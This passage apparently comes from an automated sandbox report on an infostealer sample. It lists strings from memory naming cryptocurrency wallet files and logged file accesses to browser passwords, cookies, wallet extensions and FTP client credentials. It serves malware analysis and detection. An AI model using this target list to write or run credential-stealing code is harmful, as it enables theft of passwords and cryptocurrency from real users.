Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2043049111.00000000008BC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe, 00000000.00000002.2043049111.00000000008A5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2043049111.00000000008A5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: MultiDoge
Source: file.exe, 00000000.00000002.2043049111.00000000008A5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: seed.seco
Source: file.exe, 00000000.00000002.2043049111.0000000000874000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2043049111.0000000000874000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: e708276138.exe, 0000001E.00000002.3103547372.0000000001115000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
